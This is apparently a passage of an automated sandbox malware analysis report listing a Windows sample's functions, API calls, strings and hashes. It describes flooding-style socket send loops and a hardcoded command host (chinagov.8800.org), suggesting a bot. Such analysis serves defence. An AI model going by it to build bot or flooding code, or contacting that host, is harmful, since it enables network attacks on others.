6D0C6DE0.KERNEL32(00000000), ref: 00406F13
LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406F21
6D0C6DE0.KERNEL32(00000000), ref: 00406F24
LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00406F32
6D0C6DE0.KERNEL32(00000000), ref: 00406F35
socket.WS2_32(00000002,00000001,00000006), ref: 00406F97
connect.WS2_32(00000000,?,00000010), ref: 00406FA7
send.WS2_32(00000000,?,00000800,00000000), ref: 0040702E
Sleep.KERNEL32(0000000A), ref: 00407032
RtlExitUserThread.NTDLL(00000000), ref: 0040703B
LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,761E58A0,00000000,00000000,76F90F00), ref: 0040706E
6D0C6DE0.KERNEL32(00000000), ref: 00407077
LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00407087
6D0C6DE0.KERNEL32(00000000), ref: 0040708A
LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 00407098
6D0C6DE0.KERNEL32(00000000), ref: 0040709B
sendto.WS2_32(00000000,?,0000100C,00000000,?,00000010), ref: 004071A3
RtlExitUserThread.NTDLL(00000000), ref: 004071AB
Sleep.KERNEL32(000001F4), ref: 00407210
RtlExitUserThread.NTDLL(00000000,?,00000000), ref: 00407216

Strings

GetTickCount, xrefs: 00407064
closesocket, xrefs: 00406F00
setsockopt, xrefs: 00406DD5
WSAStartup, xrefs: 00406F26, 00407079
WSASocketA, xrefs: 0040708C
KERNEL32.dll, xrefs: 00407069
WS2_32.dll, xrefs: 00406DC5, 00406DDA, 00406F05, 00406F1A, 00406F2B, 0040707E, 00407091
htons, xrefs: 00406DC0, 00406F15

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ExitThreadUser$Sleep$sendtosocket$connectinet_addrsend
String ID: GetTickCount$KERNEL32.dll$WS2_32.dll$WSASocketA$WSAStartup$closesocket$htons$setsockopt
API String ID: 1875766515-3926040945
Opcode ID: ca39cd4000dd52fb1d9514fc1105b4bdf8d10fdaecb33af4158a9940e6cff011
Instruction ID: 108494642a65384e92ce671c93e0be5eb4aeb19d0da13a5ceb95eb50e5242d09
Opcode Fuzzy Hash: ca39cd4000dd52fb1d9514fc1105b4bdf8d10fdaecb33af4158a9940e6cff011
Instruction Fuzzy Hash: 6BB118716483446BE314EB64DC05FAF77E5EBC9704F01093EF645BB2D0DAB89904879A

Function 00408130 Relevance: 61.6, APIs: 23, Strings: 12, Instructions: 327libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
6D0C6DE0.KERNEL32(00000000), ref: 00408176
LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
6D0C6DE0.KERNEL32(00000000), ref: 00408188
LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
6D0C6DE0.KERNEL32(00000000), ref: 0040819D
LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
6D0C6DE0.KERNEL32(00000000), ref: 004081AF
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
6D0C6DE0.KERNEL32(00000000), ref: 004081C1
LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
6D0C6DE0.KERNEL32(00000000), ref: 004081D6
LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
6D0C6DE0.KERNEL32(00000000), ref: 004081E8

Strings

(, xrefs: 00408577
gethostbyname, xrefs: 0040815D
gethostname, xrefs: 004081DB
closesocket, xrefs: 004078FA, 00407AFA, 00407EEA, 0040803A, 004081B4
E, xrefs: 0040835E
setsockopt, xrefs: 004074AF, 00407DB5, 00408190
WSAStartup, xrefs: 004074C0, 004081A2
WSASocketA, xrefs: 004081C9
WS2_32.dll, xrefs: 00407487, 004074B4, 004074C5, 004078FF, 00407AFF, 00407DA5, 00407DBA, 00407EEF, 0040803F, 00408162, 00408180, 00408195, 004081A7, 004081B9, 004081CE, 004081E0
P, xrefs: 004083E4
htons, xrefs: 00407482, 00407DA0, 0040817B
%d.%d.%d.%d, xrefs: 004084B7

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: %d.%d.%d.%d$($E$P$WS2_32.dll$WSASocketA$WSAStartup$closesocket$gethostbyname$gethostname$htons$setsockopt
API String ID: 1029625771-3688028543
Opcode ID: d5bec2df0a0943f906bf46e4146bb6c47795ba2453832fb3d4d13fc28c77d11d
Instruction ID: 53d6d929515b9e91ab4b685de5499f61474fe8fa857c4809401ddf33aa41e7a7
Opcode Fuzzy Hash: d5bec2df0a0943f906bf46e4146bb6c47795ba2453832fb3d4d13fc28c77d11d
Instruction Fuzzy Hash: A1D16EB5D402699BDB20DBA4CD89FEDB7B5EF94304F0040AEE249B7290DBB459C08F59

Function 00406C50 Relevance: 57.8, APIs: 6, Strings: 27, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
6D0C6DE0.KERNEL32(00000000), ref: 00406C73
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
6D0C6DE0.KERNEL32(00000000), ref: 00406C84
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
6D0C6DE0.KERNEL32(00000000), ref: 00406C95

Strings

, xrefs: 00406CFF
\, xrefs: 00406CD9
g, xrefs: 00406CEC
E, xrefs: 00406D34
o, xrefs: 00406D6A
o, xrefs: 00406CE7
lstrcatA, xrefs: 00406C75
p, xrefs: 00406D61
P, xrefs: 00406CDE
lstrcpyA, xrefs: 00406C86
n, xrefs: 00406D21
o, xrefs: 00406D46
i, xrefs: 00406D09
i, xrefs: 00406D58
\, xrefs: 00406D17
I, xrefs: 00406D1C
p, xrefs: 00406D3D
., xrefs: 00406D73
F, xrefs: 00406D04
n, xrefs: 00406D2A
KERNEL32.dll, xrefs: 00406C65, 00406C7A, 00406C8B
m, xrefs: 00406CFA
, xrefs: 00406D2F
GetSystemDirectoryA, xrefs: 00406C60
a, xrefs: 00406CF5
s, xrefs: 00406D12
\, xrefs: 00406D53

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $ $.$E$F$GetSystemDirectoryA$I$KERNEL32.dll$P$\$\$\$a$g$i$i$lstrcatA$lstrcpyA$m$n$n$o$o$o$p$p$s
API String ID: 1029625771-3412716298
Opcode ID: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
Instruction ID: 1cc97e3852dfcfcdc61d028ea0c2383468fb858139331ce9ede19e0ea5d9e28d
Opcode Fuzzy Hash: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
Instruction Fuzzy Hash: 0041E61114D3C19DE312DA799884A8FBFD55BB6608F481D9EF1C427293C2AAC64CC7BB

Function 0040336C Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 98stringlibrarynetworkCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00403389
6D0C6DE0.KERNEL32(00000000), ref: 00403392
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
6D0C6DE0.KERNEL32(00000000), ref: 004033A0
_mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
strstr.MSVCRT ref: 004033E0
memset.MSVCRT ref: 004033F9
strcspn.MSVCRT ref: 00403410
strncpy.MSVCRT ref: 0040341B
strcspn.MSVCRT ref: 0040342D
atoi.MSVCRT(?), ref: 00403437
socket.WS2_32(00000002,00000001,00000000), ref: 00403468
connect.WS2_32(00000000,00000002,00000010), ref: 00403477

Strings

EhETHRcLHRAXHREQEAkLEwsTQw==, xrefs: 004033B8
closesocket, xrefs: 00403394
WS2_32.dll, xrefs: 0040337E, 00403388, 00403399
htons, xrefs: 00403383

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoadstrcspn$_mbscpyatoiconnectmemsetsocketstrncpystrstr
String ID: EhETHRcLHRAXHREQEAkLEwsTQw==$WS2_32.dll$closesocket$htons
API String ID: 2841553729-84791798
Opcode ID: b0d02812e01bd494b323ff795dfcab75fceb7154f08fe877454a16fbfcbf3fe1
Instruction ID: 6aa5ca56811b2828efdf987d7b23adbf84b4b011ef7c06a256cd014a8a3b1787
Opcode Fuzzy Hash: b0d02812e01bd494b323ff795dfcab75fceb7154f08fe877454a16fbfcbf3fe1
Instruction Fuzzy Hash: D931B871900218BBDB10ABB49D49FDF7A6CAF05314F104577F609F72E1DA785A448BA8

Function 0040588B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58sleeplibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 00405898
6D0C6DE0.KERNEL32(00000000), ref: 0040589F
Sleep.KERNEL32(000001F4), ref: 004058E2
Sleep.KERNEL32(000001F4), ref: 00405926
Sleep.KERNEL32(000001F4), ref: 00405961

Strings

ADVAPI32.dll, xrefs: 00405893
SetServiceStatus, xrefs: 0040588E

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Sleep$LibraryLoad
String ID: ADVAPI32.dll$SetServiceStatus
API String ID: 3235702935-1924299548
Opcode ID: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
Instruction ID: a5c8a0c86872ce331e11fcaa3c45903c56c1e4641523fec5342e9324e04e0236
Opcode Fuzzy Hash: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
Instruction Fuzzy Hash: 6A1158B1121262DBFB105B16EE4CB573AA6F704319F00803AE544B62B2C7B90C54CF3E

Function 004050CA Relevance: 9.0, APIs: 6, Instructions: 25sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 004050DB
CreateThread.KERNEL32(00000000,00000000,Function_0000407C,00000000,00000000,00000000), ref: 004050ED
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050FB
CloseHandle.KERNEL32 ref: 00405107
closesocket.WS2_32 ref: 00405113
Sleep.KERNEL32(0000012C), ref: 0040511E

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
String ID:
API String ID: 964154963-0
Opcode ID: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
Instruction ID: a79ab9a2dfc38e3776cf33d79ac1821f4f8275b6afc8926fd1558f3327be2bb1
Opcode Fuzzy Hash: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
Instruction Fuzzy Hash: CAE0C972406260FBD3216BA1AE4DDAB3E68FB0A3A1F144235F359B50F5DB340854CBA9

Function 00405126 Relevance: 9.0, APIs: 6, Instructions: 25sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 00405137
CreateThread.KERNEL32(00000000,00000000,Function_000048AA,00000000,00000000,00000000), ref: 00405149
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405157
CloseHandle.KERNEL32 ref: 00405163
closesocket.WS2_32 ref: 0040516F
Sleep.KERNEL32(0000012C), ref: 0040517A

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
String ID:
API String ID: 964154963-0
Opcode ID: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
Instruction ID: 597c19437f16af45fe4c7fafc924f242b911babb52725cfa5b12b60dc2fdca2e
Opcode Fuzzy Hash: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
Instruction Fuzzy Hash: D0E0C076406160BFD3216BA1EF4DD9B3E68EF0A361B044135F35AB44F5C6780454CBA9

Function 0040484F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00001F9A), ref: 00404861

Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
Part of subcall function 00406C10: 6D0C6DE0.KERNEL32(00000000), ref: 00406C23
Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30

socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
closesocket.WS2_32(00000000), ref: 0040489A

Strings

chinagov.8800.org, xrefs: 00404867

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoadclosesocketconnecthtonsinet_addrsocket
String ID: chinagov.8800.org
API String ID: 2269069743-2288617695
Opcode ID: 41718983f1c9e5c223780d873f69bff2d5abf28acc2154f537cf20909f978101
Instruction ID: aa8867dea59f3e018d1c3fe77959f1df48631034d4a5c4a8dfe27a3f3de7d62f
Opcode Fuzzy Hash: 41718983f1c9e5c223780d873f69bff2d5abf28acc2154f537cf20909f978101
Instruction Fuzzy Hash: 5DF08235A002247AEB1067A49D0ABEE7668EF09764F104726F721BA1E1D7B84550879D

Function 00406C10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
6D0C6DE0.KERNEL32(00000000), ref: 00406C23
inet_addr.WS2_32(?), ref: 00406C30

Strings

gethostbyname, xrefs: 00406C12
WS2_32.dll, xrefs: 00406C17

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoadinet_addr
String ID: WS2_32.dll$gethostbyname
API String ID: 4063186387-1612545655
Opcode ID: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
Instruction ID: fa684150f8c7a78303bc788c4e7da3796caaeb6c4f1dce52f515438040d0683d
Opcode Fuzzy Hash: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
Instruction Fuzzy Hash: 2DE09A393042009BE3049B26FE48DAA3BE8DAC9722305407AF942E3260C334C8428A68

Function 00406BD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 16libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
6D0C6DE0.KERNEL32(00000000), ref: 00406BE2

Strings

Defghi Klmnopqr Tuv, xrefs: 00406BD0
GetTickCount, xrefs: 00406BD1
KERNEL32.dll, xrefs: 00406BD6

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: Defghi Klmnopqr Tuv$GetTickCount$KERNEL32.dll
API String ID: 1029625771-1458725802
Opcode ID: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
Instruction ID: e2b8e24bfa267fa6e9ec36e760088df98f66f050865d098ef55141e691ac327e
Opcode Fuzzy Hash: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
Instruction Fuzzy Hash: 69D02272A802129BD30033BADF0FACA7AA99AC83553048037B084F24B4DF38C4404798

Function 004051E3 Relevance: 7.5, APIs: 5, Instructions: 34sleepthreadnetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 004051F9
Sleep.KERNEL32(00000064), ref: 00405207

Part of subcall function 0040507D: time.MSVCRT(00000000), ref: 00405087
Part of subcall function 0040507D: localtime.MSVCRT(?), ref: 00405094
Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD

atoi.MSVCRT(?,?), ref: 0040521C
Sleep.KERNEL32(00000064), ref: 0040522D
CreateThread.KERNEL32(00000000,00000000,00405126,00000000,00000000,00000000), ref: 0040523B

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Sleep$CreateStartupThreadatoilocaltimetimewsprintf
String ID:
API String ID: 1855471192-0
Opcode ID: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
Instruction ID: 0daf81d4eef7f1fa0beb5b5478619bf314a177f2874e1709eaed204b22834378
Opcode Fuzzy Hash: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
Instruction Fuzzy Hash: 68F03776D00218AEE71067B0AD4EFBB776CEB08710F000066BA45F60D1D6749D548EB5

Function 00405182 Relevance: 7.5, APIs: 5, Instructions: 34sleepthreadnetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00405198
Sleep.KERNEL32(00000064), ref: 004051A6

Part of subcall function 0040507D: time.MSVCRT(00000000), ref: 00405087
Part of subcall function 0040507D: localtime.MSVCRT(?), ref: 00405094
Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD

atoi.MSVCRT(?,?), ref: 004051BB
Sleep.KERNEL32(00000064), ref: 004051CC
CreateThread.KERNEL32(00000000,00000000,004050CA,00000000,00000000,00000000), ref: 004051DA

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Sleep$CreateStartupThreadatoilocaltimetimewsprintf
String ID:
API String ID: 1855471192-0
Opcode ID: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
Instruction ID: f150061eb18795c979dcc7452c8c87f20c1a6e1286e61ebe96203e18624e51ff
Opcode Fuzzy Hash: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
Instruction Fuzzy Hash: F3F030B6D0022CAEE71067B0AD4EFBB776CEB08710F000066BA45F60D1E6749D848EB9

Function 004067E9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00406731
GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
sprintf.MSVCRT ref: 004068CD
_mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000001,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040693E

Strings

%u Gbps, xrefs: 004068C1
KVa7, xrefs: 0040685E

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Table$??2@??3@_mbscpysprintfstrcmp
String ID: %u Gbps$KVa7
API String ID: 3420875952-2796686009
Opcode ID: 6098c4a6c90d9ca05f699309847211eacf8128fdf5923c6fd41ae41f8db015e8
Instruction ID: a7a8e1041bd709416f2cdac98afc023946ef9f584d3dcb890be07267fec2ea1a
Opcode Fuzzy Hash: 6098c4a6c90d9ca05f699309847211eacf8128fdf5923c6fd41ae41f8db015e8
Instruction Fuzzy Hash: 18210E70A005158BD72ECB04CE94BA9B3BAFB94309F0941FDE10EAB6E5D6356F918F44

Function 0040507D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

time.MSVCRT(00000000), ref: 00405087
localtime.MSVCRT(?), ref: 00405094
wsprintfA.USER32 ref: 004050BD

Strings

%04d%02d%02d, xrefs: 004050B5

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: localtimetimewsprintf
String ID: %04d%02d%02d
API String ID: 1360778613-2607228566
Opcode ID: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
Instruction ID: 6ead3e3b7a45fc54b5a265f10b09fe02a5435c176a1f4316584398403dd6ae14
Opcode Fuzzy Hash: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
Instruction Fuzzy Hash: ACF01C32900108AFDF05ABD9DE49FEF7BB8EB48311F100021FA06FA2A1D6755A55DBA5

Function 00402A37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00402A46
6D0C6DE0.KERNEL32(00000000), ref: 00402A4D

Strings

WS2_32.dll, xrefs: 00402A41
htons, xrefs: 00402A3C

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: WS2_32.dll$htons
API String ID: 1029625771-178149120
Opcode ID: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
Instruction ID: 2561ae12f7e90b5fc780e89bc5807c04a20d660f8c717e8047036cfcaa43c05d
Opcode Fuzzy Hash: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
